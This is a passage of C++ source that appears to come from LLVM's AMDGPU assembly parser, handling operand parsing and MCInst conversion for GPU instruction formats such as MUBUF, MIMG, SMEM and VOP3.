    if (Mode == 0) {
      Error(S, (Imm == 0)?
               "expected a VGPR index mode or a closing parenthesis" :
               "expected a VGPR index mode");
      return UNDEF;
    }

    // Each mode may be listed at most once.
    if (Imm & Mode) {
      Error(S, "duplicate VGPR index mode");
      return UNDEF;
    }
    Imm |= Mode;

    if (trySkipToken(AsmToken::RParen))
      break;
    if (!skipToken(AsmToken::Comma,
                   "expected a comma or a closing parenthesis"))
      return UNDEF;
  }

  return Imm;
}
// Parse a VGPR index mode operand: either the symbolic gpr_idx(...) macro
// or a plain 4-bit immediate.
OperandMatchResultTy
AMDGPUAsmParser::parseGPRIdxMode(OperandVector &Operands) {
  using namespace llvm::AMDGPU::VGPRIndexMode;

  int64_t Mode = 0;
  SMLoc S = getLoc();

  if (trySkipId("gpr_idx", AsmToken::LParen)) {
    Mode = parseGPRIdxMacro();
    if (Mode == UNDEF)
      return MatchOperand_ParseFail;
  } else {
    if (getParser().parseAbsoluteExpression(Mode))
      return MatchOperand_ParseFail;
    if (Mode < 0 || !isUInt<4>(Mode)) {
      Error(S, "invalid immediate: only 4-bit values are legal");
      return MatchOperand_ParseFail;
    }
  }

  Operands.push_back(
      AMDGPUOperand::CreateImm(this, Mode, S, AMDGPUOperand::ImmTyGprIdxMode));
  return MatchOperand_Success;
}
// gpr_idx operands are immediates tagged ImmTyGprIdxMode.
bool
AMDGPUOperand::isGPRIdxMode() const {
  return isImmTy(ImmTyGprIdxMode);
}
//===----------------------------------------------------------------------===//
// sopp branch targets
//===----------------------------------------------------------------------===//
// Parse a SOPP branch target: a label or a 16-bit signed offset.
OperandMatchResultTy
AMDGPUAsmParser::parseSOppBrTarget(OperandVector &Operands) {
  // Make sure we are not parsing something
  // that looks like a label or an expression but is not.
  // This will improve error messages.
  if (isRegister() || isModifier())
    return MatchOperand_NoMatch;

  if (!parseExpr(Operands))
    return MatchOperand_ParseFail;

  AMDGPUOperand &Opr = ((AMDGPUOperand &)*Operands[Operands.size() - 1]);
  assert(Opr.isImm() || Opr.isExpr());
  SMLoc Loc = Opr.getStartLoc();

  // Currently we do not support arbitrary expressions as branch targets.
  // Only labels and absolute expressions are accepted.
  if (Opr.isExpr() && !Opr.isSymbolRefExpr()) {
    Error(Loc, "expected an absolute expression or a label");
  } else if (Opr.isImm() && !Opr.isS16Imm()) {
    Error(Loc, "expected a 16-bit signed jump offset");
  }
  // Note: a diagnostic may have been emitted above, yet Success is still
  // returned so the operand remains on the list.

  return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// Boolean holding registers
//===----------------------------------------------------------------------===//
// Boolean-holding registers parse exactly like ordinary registers.
OperandMatchResultTy AMDGPUAsmParser::parseBoolReg(OperandVector &Operands) {
  return parseReg(Operands);
}
//===----------------------------------------------------------------------===//
// mubuf
//===----------------------------------------------------------------------===//
// Default cache policy operand: all policy bits cleared.
AMDGPUOperand::Ptr
AMDGPUAsmParser::defaultCPol() const {
  return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyCPol);
}
// Common MCInst conversion for MUBUF instructions (plain, atomic and lds
// variants).
void AMDGPUAsmParser::cvtMubufImpl(MCInst &Inst,
                                   const OperandVector &Operands,
                                   bool IsAtomic,
                                   bool IsLds) {
  bool IsLdsOpcode = IsLds;
  bool HasLdsModifier = false;
  OptionalImmIndexMap OptionalIdx;
  unsigned FirstOperandIdx = 1;
  bool IsAtomicReturn = false;

  if (IsAtomic) {
    // An atomic is a "return" atomic iff its cache policy has GLC set.
    for (unsigned i = FirstOperandIdx, e = Operands.size(); i != e; ++i) {
      AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
      if (!Op.isCPol())
        continue;
      IsAtomicReturn = Op.getImm() & AMDGPU::CPol::GLC;
      break;
    }

    // Without GLC, switch to the no-return opcode variant when available.
    if (!IsAtomicReturn) {
      int NewOpc = AMDGPU::getAtomicNoRetOp(Inst.getOpcode());
      if (NewOpc != -1)
        Inst.setOpcode(NewOpc);
    }

    // Re-derive the flag from the (possibly rewritten) opcode.
    IsAtomicReturn = MII.get(Inst.getOpcode()).TSFlags &
                     SIInstrFlags::IsAtomicRet;
  }

  for (unsigned i = FirstOperandIdx, e = Operands.size(); i != e; ++i) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);

    // Add the register arguments
    if (Op.isReg()) {
      Op.addRegOperands(Inst, 1);
      // Insert a tied src for atomic return dst.
      // This cannot be postponed as subsequent calls to
      // addImmOperands rely on correct number of MC operands.
      if (IsAtomicReturn && i == FirstOperandIdx)
        Op.addRegOperands(Inst, 1);
      continue;
    }

    // Handle the case where soffset is an immediate
    if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyNone) {
      Op.addImmOperands(Inst, 1);
      continue;
    }

    HasLdsModifier |= Op.isLDS();

    // Handle tokens like 'offen' which are sometimes hard-coded into the
    // asm string. There are no MCInst operands for these.
    if (Op.isToken()) {
      continue;
    }
    assert(Op.isImm());

    // Handle optional arguments
    OptionalIdx[Op.getImmTy()] = i;
  }

  // This is a workaround for an llvm quirk which may result in an
  // incorrect instruction selection. Lds and non-lds versions of
  // MUBUF instructions are identical except that lds versions
  // have mandatory 'lds' modifier. However this modifier follows
  // optional modifiers and llvm asm matcher regards this 'lds'
  // modifier as an optional one. As a result, an lds version
  // of opcode may be selected even if it has no 'lds' modifier.
  if (IsLdsOpcode && !HasLdsModifier) {
    int NoLdsOpcode = AMDGPU::getMUBUFNoLdsInst(Inst.getOpcode());
    if (NoLdsOpcode != -1) { // Got lds version - correct it.
      Inst.setOpcode(NoLdsOpcode);
      IsLdsOpcode = false;
    }
  }

  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol, 0);

  if (!IsLdsOpcode) { // tfe is not legal with lds opcodes
    addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyTFE);
  }
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySWZ);
}
// Convert parsed MTBUF operands to MCInst operands: registers and the
// immediate soffset in parse order, then the optional modifiers in the
// order the encoding expects.
void AMDGPUAsmParser::cvtMtbuf(MCInst &Inst, const OperandVector &Operands) {
  OptionalImmIndexMap OptionalIdx;

  for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);

    // Add the register arguments
    if (Op.isReg()) {
      Op.addRegOperands(Inst, 1);
      continue;
    }

    // Handle the case where soffset is an immediate
    if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyNone) {
      Op.addImmOperands(Inst, 1);
      continue;
    }

    // Handle tokens like 'offen' which are sometimes hard-coded into the
    // asm string. There are no MCInst operands for these.
    if (Op.isToken()) {
      continue;
    }
    assert(Op.isImm());

    // Handle optional arguments
    OptionalIdx[Op.getImmTy()] = i;
  }

  addOptionalImmOperand(Inst, Operands, OptionalIdx,
                        AMDGPUOperand::ImmTyOffset);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyFORMAT);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol, 0);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyTFE);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySWZ);
}
//===----------------------------------------------------------------------===//
// mimg
//===----------------------------------------------------------------------===//
// Convert parsed MIMG operands to MCInst operands: defs first, then an
// optional tied src for atomics, then the remaining register and
// immediate-modifier operands.
void AMDGPUAsmParser::cvtMIMG(MCInst &Inst, const OperandVector &Operands,
                              bool IsAtomic) {
  unsigned I = 1;
  const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
  for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
    ((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
  }

  if (IsAtomic) {
    // Add src, same as dst
    assert(Desc.getNumDefs() == 1);
    ((AMDGPUOperand &)*Operands[I - 1]).addRegOperands(Inst, 1);
  }

  OptionalImmIndexMap OptionalIdx;

  for (unsigned E = Operands.size(); I != E; ++I) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);

    // Add the register arguments
    if (Op.isReg()) {
      Op.addRegOperands(Inst, 1);
    } else if (Op.isImmModifier()) {
      OptionalIdx[Op.getImmTy()] = I;
    } else if (!Op.isToken()) {
      llvm_unreachable("unexpected operand type");
    }
  }

  bool IsGFX10Plus = isGFX10Plus();

  // Append optional modifiers in encoding order; some exist only on
  // particular generations.
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDMask);
  if (IsGFX10Plus)
    addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDim, -1);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyUNorm);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyR128A16);
  if (IsGFX10Plus)
    addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyA16);
  if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::tfe) != -1)
    addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyTFE);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyLWE);
  if (!IsGFX10Plus)
    addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDA);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyD16);
}
// Atomic MIMG conversion: same as cvtMIMG with the dst-also-src handling on.
void AMDGPUAsmParser::cvtMIMGAtomic(MCInst &Inst, const OperandVector &Operands) {
cvtMIMG(Inst, Operands, true);
}
// Convert parsed SMEM atomic operands into MCInst operands.
// The GLC cpol bit selects between the returning and non-returning opcode
// variants; when it is clear the opcode is switched to the no-return form
// before operands are laid out.
void AMDGPUAsmParser::cvtSMEMAtomic(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
bool IsAtomicReturn = false;
// First pass: find the cpol operand and read its GLC bit.
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
if (!Op.isCPol())
continue;
IsAtomicReturn = Op.getImm() & AMDGPU::CPol::GLC;
break;
}
if (!IsAtomicReturn) {
int NewOpc = AMDGPU::getAtomicNoRetOp(Inst.getOpcode());
if (NewOpc != -1)
Inst.setOpcode(NewOpc);
}
// Re-derive the return-ness from the (possibly switched) opcode's flags.
IsAtomicReturn = MII.get(Inst.getOpcode()).TSFlags &
SIInstrFlags::IsAtomicRet;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
// For the returning form the first register is both data and dest.
if (IsAtomicReturn && i == 1)
Op.addRegOperands(Inst, 1);
continue;
}
// Handle the case where soffset is an immediate
if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyNone) {
Op.addImmOperands(Inst, 1);
continue;
}
// Handle tokens like 'offen' which are sometimes hard-coded into the
// asm string. There are no MCInst operands for these.
if (Op.isToken()) {
continue;
}
assert(Op.isImm());
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
// Only add a default offset if the offset slot has not been filled yet.
if ((int)Inst.getNumOperands() <=
AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::offset))
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol, 0);
}
// Convert image_bvh_intersect_ray operands: all registers in parse order,
// then a hard-coded a16 immediate of 1 (this conversion is used for the
// a16 forms only).
void AMDGPUAsmParser::cvtIntersectRay(MCInst &Inst,
const OperandVector &Operands) {
for (unsigned I = 1; I < Operands.size(); ++I) {
auto &Operand = (AMDGPUOperand &)*Operands[I];
if (Operand.isReg())
Operand.addRegOperands(Inst, 1);
}
Inst.addOperand(MCOperand::createImm(1)); // a16
}
//===----------------------------------------------------------------------===//
// smrd
//===----------------------------------------------------------------------===//
// True if this operand is an immediate that fits the 8-bit SMRD offset field.
bool AMDGPUOperand::isSMRDOffset8() const {
return isImm() && isUInt<8>(getImm());
}
// Any immediate is accepted as an SMEM offset at parse time.
bool AMDGPUOperand::isSMEMOffset() const {
return isImm(); // Offset range is checked later by validator.
}
// True if this operand requires the 32-bit literal SMRD offset encoding:
// an immediate that does not fit 8 bits but does fit 32.
bool AMDGPUOperand::isSMRDLiteralOffset() const {
// 32-bit literals are only supported on CI and we only want to use them
// when the offset is > 8-bits.
return isImm() && !isUInt<8>(getImm()) && isUInt<32>(getImm());
}
// Default (zero) immediate for an omitted 8-bit SMRD offset.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultSMRDOffset8() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
// Default (zero) immediate for an omitted SMEM offset.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultSMEMOffset() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
// Default (zero) immediate for an omitted SMRD literal offset.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultSMRDLiteralOffset() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
// Default (zero) immediate for an omitted FLAT offset.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultFlatOffset() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
//===----------------------------------------------------------------------===//
// vop3
//===----------------------------------------------------------------------===//
// Convert an omod "mul" factor to its encoded value: mul:1 -> 0,
// mul:2 -> 1, mul:4 -> 2. Any other factor is rejected.
static bool ConvertOmodMul(int64_t &Mul) {
  switch (Mul) {
  case 1:
    Mul = 0;
    return true;
  case 2:
    Mul = 1;
    return true;
  case 4:
    Mul = 2;
    return true;
  default:
    return false;
  }
}
// Convert an omod "div" factor to its encoded value: div:1 -> 0,
// div:2 -> 3. Any other factor is rejected.
static bool ConvertOmodDiv(int64_t &Div) {
  switch (Div) {
  case 1:
    Div = 0;
    return true;
  case 2:
    Div = 3;
    return true;
  default:
    return false;
  }
}
// Both bound_ctrl:0 and bound_ctrl:1 are encoded as 1.
// This is intentional and ensures compatibility with sp3.
// See bug 35397 for details.
static bool ConvertBoundCtrl(int64_t &BoundCtrl) {
  const bool IsValid = (BoundCtrl == 0) || (BoundCtrl == 1);
  if (IsValid)
    BoundCtrl = 1;
  return IsValid;
}
// Note: the order in this table matches the order of operands in AsmString.
// Each entry: operand name, immediate type, whether it is a bare bit
// (present/absent, no value), and an optional value-conversion callback.
// NOTE(review): "d16" appears twice; given the ordering constraint above
// this looks deliberate (different positions in different AsmStrings) --
// confirm before deduplicating.
static const OptionalOperand AMDGPUOptionalOperandTable[] = {
{"offen", AMDGPUOperand::ImmTyOffen, true, nullptr},
{"idxen", AMDGPUOperand::ImmTyIdxen, true, nullptr},
{"addr64", AMDGPUOperand::ImmTyAddr64, true, nullptr},
{"offset0", AMDGPUOperand::ImmTyOffset0, false, nullptr},
{"offset1", AMDGPUOperand::ImmTyOffset1, false, nullptr},
{"gds", AMDGPUOperand::ImmTyGDS, true, nullptr},
{"lds", AMDGPUOperand::ImmTyLDS, true, nullptr},
{"offset", AMDGPUOperand::ImmTyOffset, false, nullptr},
{"inst_offset", AMDGPUOperand::ImmTyInstOffset, false, nullptr},
{"", AMDGPUOperand::ImmTyCPol, false, nullptr},
{"swz", AMDGPUOperand::ImmTySWZ, true, nullptr},
{"tfe", AMDGPUOperand::ImmTyTFE, true, nullptr},
{"d16", AMDGPUOperand::ImmTyD16, true, nullptr},
{"high", AMDGPUOperand::ImmTyHigh, true, nullptr},
{"clamp", AMDGPUOperand::ImmTyClampSI, true, nullptr},
{"omod", AMDGPUOperand::ImmTyOModSI, false, ConvertOmodMul},
{"unorm", AMDGPUOperand::ImmTyUNorm, true, nullptr},
{"da", AMDGPUOperand::ImmTyDA, true, nullptr},
{"r128", AMDGPUOperand::ImmTyR128A16, true, nullptr},
{"a16", AMDGPUOperand::ImmTyA16, true, nullptr},
{"lwe", AMDGPUOperand::ImmTyLWE, true, nullptr},
{"d16", AMDGPUOperand::ImmTyD16, true, nullptr},
{"dmask", AMDGPUOperand::ImmTyDMask, false, nullptr},
{"dim", AMDGPUOperand::ImmTyDim, false, nullptr},
{"row_mask", AMDGPUOperand::ImmTyDppRowMask, false, nullptr},
{"bank_mask", AMDGPUOperand::ImmTyDppBankMask, false, nullptr},
{"bound_ctrl", AMDGPUOperand::ImmTyDppBoundCtrl, false, ConvertBoundCtrl},
{"fi", AMDGPUOperand::ImmTyDppFi, false, nullptr},
{"dst_sel", AMDGPUOperand::ImmTySdwaDstSel, false, nullptr},
{"src0_sel", AMDGPUOperand::ImmTySdwaSrc0Sel, false, nullptr},
{"src1_sel", AMDGPUOperand::ImmTySdwaSrc1Sel, false, nullptr},
{"dst_unused", AMDGPUOperand::ImmTySdwaDstUnused, false, nullptr},
{"compr", AMDGPUOperand::ImmTyExpCompr, true, nullptr },
{"vm", AMDGPUOperand::ImmTyExpVM, true, nullptr},
{"op_sel", AMDGPUOperand::ImmTyOpSel, false, nullptr},
{"op_sel_hi", AMDGPUOperand::ImmTyOpSelHi, false, nullptr},
{"neg_lo", AMDGPUOperand::ImmTyNegLo, false, nullptr},
{"neg_hi", AMDGPUOperand::ImmTyNegHi, false, nullptr},
{"blgp", AMDGPUOperand::ImmTyBLGP, false, nullptr},
{"cbsz", AMDGPUOperand::ImmTyCBSZ, false, nullptr},
{"abid", AMDGPUOperand::ImmTyABID, false, nullptr}
};
// Called at the start of assembling a file: initialize the target ID from
// the subtarget's feature string and, for HSA code-object v3+, emit the
// .amdgcn_target directive. Skipped for r600 and when no target streamer
// is available.
void AMDGPUAsmParser::onBeginOfFile() {
if (!getParser().getStreamer().getTargetStreamer() ||
getSTI().getTargetTriple().getArch() == Triple::r600)
return;
if (!getTargetStreamer().getTargetID())
getTargetStreamer().initializeTargetID(getSTI(), getSTI().getFeatureString());
if (isHsaAbiVersion3AndAbove(&getSTI()))
getTargetStreamer().EmitDirectiveAMDGCNTarget();
}
// Parse one optional operand, then keep consuming further optional
// operands (up to MAX_OPR_LOOKAHEAD) so the autogenerated matcher never
// lands on a hard-coded mandatory operand.
OperandMatchResultTy AMDGPUAsmParser::parseOptionalOperand(OperandVector &Operands) {
OperandMatchResultTy res = parseOptionalOpr(Operands);
// This is a hack to enable hardcoded mandatory operands which follow
// optional operands.
//
// Current design assumes that all operands after the first optional operand
// are also optional. However implementation of some instructions violates
// this rule (see e.g. flat/global atomic which have hardcoded 'glc' operands).
//
// To alleviate this problem, we have to (implicitly) parse extra operands
// to make sure autogenerated parser of custom operands never hit hardcoded
// mandatory operands.
for (unsigned i = 0; i < MAX_OPR_LOOKAHEAD; ++i) {
if (res != MatchOperand_Success ||
isToken(AsmToken::EndOfStatement))
break;
trySkipToken(AsmToken::Comma);
res = parseOptionalOpr(Operands);
}
return res;
}
// Try each entry of AMDGPUOptionalOperandTable in turn, dispatching to the
// specialized parser for the operand kind. Returns the first result that is
// not NoMatch (success or parse failure); NoMatch if no entry applied.
OperandMatchResultTy AMDGPUAsmParser::parseOptionalOpr(OperandVector &Operands) {
OperandMatchResultTy res;
for (const OptionalOperand &Op : AMDGPUOptionalOperandTable) {
// try to parse any optional operand here
if (Op.IsBit) {
res = parseNamedBit(Op.Name, Operands, Op.Type);
} else if (Op.Type == AMDGPUOperand::ImmTyOModSI) {
res = parseOModOperand(Operands);
} else if (Op.Type == AMDGPUOperand::ImmTySdwaDstSel ||
Op.Type == AMDGPUOperand::ImmTySdwaSrc0Sel ||
Op.Type == AMDGPUOperand::ImmTySdwaSrc1Sel) {
res = parseSDWASel(Operands, Op.Name, Op.Type);
} else if (Op.Type == AMDGPUOperand::ImmTySdwaDstUnused) {
res = parseSDWADstUnused(Operands);
} else if (Op.Type == AMDGPUOperand::ImmTyOpSel ||
Op.Type == AMDGPUOperand::ImmTyOpSelHi ||
Op.Type == AMDGPUOperand::ImmTyNegLo ||
Op.Type == AMDGPUOperand::ImmTyNegHi) {
res = parseOperandArrayWithPrefix(Op.Name, Operands, Op.Type,
Op.ConvertResult);
} else if (Op.Type == AMDGPUOperand::ImmTyDim) {
res = parseDim(Operands);
} else if (Op.Type == AMDGPUOperand::ImmTyCPol) {
res = parseCPol(Operands);
} else {
res = parseIntWithPrefix(Op.Name, Operands, Op.Type, Op.ConvertResult);
}
if (res != MatchOperand_NoMatch) {
return res;
}
}
return MatchOperand_NoMatch;
}
// Parse an output-modifier operand, either "mul:<n>" or "div:<n>", using
// the matching conversion callback. Any other token yields NoMatch.
OperandMatchResultTy AMDGPUAsmParser::parseOModOperand(OperandVector &Operands) {
  const StringRef Tok = getTokenStr();
  if (Tok == "mul")
    return parseIntWithPrefix("mul", Operands, AMDGPUOperand::ImmTyOModSI,
                              ConvertOmodMul);
  if (Tok == "div")
    return parseIntWithPrefix("div", Operands, AMDGPUOperand::ImmTyOModSI,
                              ConvertOmodDiv);
  return MatchOperand_NoMatch;
}
// VOP3 op_sel conversion: after the regular VOP3P conversion, propagate the
// op_sel bit that corresponds to the destination (the bit just past the last
// source) into src0_modifiers as DST_OP_SEL.
void AMDGPUAsmParser::cvtVOP3OpSel(MCInst &Inst, const OperandVector &Operands) {
cvtVOP3P(Inst, Operands);
int Opc = Inst.getOpcode();
int SrcNum;
const int Ops[] = { AMDGPU::OpName::src0,
AMDGPU::OpName::src1,
AMDGPU::OpName::src2 };
// Count how many src operands this opcode actually has (1..3).
for (SrcNum = 0;
SrcNum < 3 && AMDGPU::getNamedOperandIdx(Opc, Ops[SrcNum]) != -1;
++SrcNum);
assert(SrcNum > 0);
int OpSelIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel);
unsigned OpSel = Inst.getOperand(OpSelIdx).getImm();
// The bit at position SrcNum is the destination's op_sel bit.
if ((OpSel & (1 << SrcNum)) != 0) {
int ModIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0_modifiers);
uint32_t ModVal = Inst.getOperand(ModIdx).getImm();
Inst.getOperand(ModIdx).setImm(ModVal | SISrcMods::DST_OP_SEL);
}
}
// True if the MCInst operand slot OpNum is an input-modifiers operand that
// is immediately followed by an untied register-class operand, i.e. the
// next parsed source should be emitted as (modifiers, register) pair.
static bool isRegOrImmWithInputMods(const MCInstrDesc &Desc, unsigned OpNum) {
// 1. This operand is input modifiers
return Desc.OpInfo[OpNum].OperandType == AMDGPU::OPERAND_INPUT_MODS
// 2. This is not last operand
&& Desc.NumOperands > (OpNum + 1)
// 3. Next operand is register class
&& Desc.OpInfo[OpNum + 1].RegClass != -1
// 4. Next register is not tied to any other operand
&& Desc.getOperandConstraint(OpNum + 1, MCOI::OperandConstraint::TIED_TO) == -1;
}
// Convert VOP3 interpolation instructions (v_interp_*): defs first, then
// sources (with FP input modifiers where the slot expects them), with the
// interp-specific slot/attr/chan operands emitted as plain immediates.
// Optional high/clamp/omod are appended only if the opcode has those slots.
void AMDGPUAsmParser::cvtVOP3Interp(MCInst &Inst, const OperandVector &Operands)
{
OptionalImmIndexMap OptionalIdx;
unsigned Opc = Inst.getOpcode();
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegOrImmWithFPInputModsOperands(Inst, 2);
} else if (Op.isInterpSlot() ||
Op.isInterpAttr() ||
Op.isAttrChan()) {
Inst.addOperand(MCOperand::createImm(Op.getImm()));
} else if (Op.isImmModifier()) {
OptionalIdx[Op.getImmTy()] = I;
} else {
llvm_unreachable("unhandled operand type");
}
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::high) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyHigh);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::clamp) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::omod) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI);
}
}
// Core VOP3 conversion: defs, then sources (paired with modifiers when the
// opcode has src0_modifiers), then optional clamp/omod. For the v_mac/v_fmac
// family a zero src2_modifiers operand and a copy of the dst register are
// inserted because src2 is tied to dst and modifiers are not allowed on it.
void AMDGPUAsmParser::cvtVOP3(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptionalIdx) {
unsigned Opc = Inst.getOpcode();
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0_modifiers) != -1) {
// This instruction has src modifiers
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegOrImmWithFPInputModsOperands(Inst, 2);
} else if (Op.isImmModifier()) {
OptionalIdx[Op.getImmTy()] = I;
} else if (Op.isRegOrImm()) {
Op.addRegOrImmOperands(Inst, 1);
} else {
llvm_unreachable("unhandled operand type");
}
}
} else {
// No src modifiers
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (Op.isMod()) {
OptionalIdx[Op.getImmTy()] = I;
} else {
Op.addRegOrImmOperands(Inst, 1);
}
}
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::clamp) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::omod) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI);
}
// Special case v_mac_{f16, f32} and v_fmac_{f16, f32} (gfx906/gfx10+):
// it has src2 register operand that is tied to dst operand
// we don't allow modifiers for this operand in assembler so src2_modifiers
// should be 0.
if (Opc == AMDGPU::V_MAC_F32_e64_gfx6_gfx7 ||
Opc == AMDGPU::V_MAC_F32_e64_gfx10 ||
Opc == AMDGPU::V_MAC_F32_e64_vi ||
Opc == AMDGPU::V_MAC_LEGACY_F32_e64_gfx6_gfx7 ||
Opc == AMDGPU::V_MAC_LEGACY_F32_e64_gfx10 ||
Opc == AMDGPU::V_MAC_F16_e64_vi ||
Opc == AMDGPU::V_FMAC_F64_e64_gfx90a ||
Opc == AMDGPU::V_FMAC_F32_e64_gfx10 ||
Opc == AMDGPU::V_FMAC_F32_e64_vi ||
Opc == AMDGPU::V_FMAC_LEGACY_F32_e64_gfx10 ||
Opc == AMDGPU::V_FMAC_F16_e64_gfx10) {
auto it = Inst.begin();
std::advance(it, AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src2_modifiers));
it = Inst.insert(it, MCOperand::createImm(0)); // no modifiers for src2
++it;
// Copy the operand to ensure it's not invalidated when Inst grows.
Inst.insert(it, MCOperand(Inst.getOperand(0))); // src2 = dst
}
}
// Convenience overload: VOP3 conversion with a throwaway optional-index map.
void AMDGPUAsmParser::cvtVOP3(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
cvtVOP3(Inst, Operands, OptionalIdx);
}
// VOP3P-specific post-processing: append the packed-math modifier operands
// (op_sel, op_sel_hi, neg_lo, neg_hi) that the opcode defines, then fold
// their per-source bits into the corresponding srcN_modifiers operands.
void AMDGPUAsmParser::cvtVOP3P(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptIdx) {
const int Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
const bool IsPacked = (Desc.TSFlags & SIInstrFlags::IsPacked) != 0;
// vdst_in means the destination is also an input; duplicate operand 0.
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::vdst_in) != -1) {
assert(!IsPacked);
Inst.addOperand(Inst.getOperand(0));
}
// FIXME: This is messy. Parse the modifiers as if it was a normal VOP3
// instruction, and then figure out where to actually put the modifiers
int OpSelIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel);
if (OpSelIdx != -1) {
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyOpSel);
}
int OpSelHiIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel_hi);
if (OpSelHiIdx != -1) {
// Packed ops default op_sel_hi to all-ones (-1); unpacked default to 0.
int DefaultVal = IsPacked ? -1 : 0;
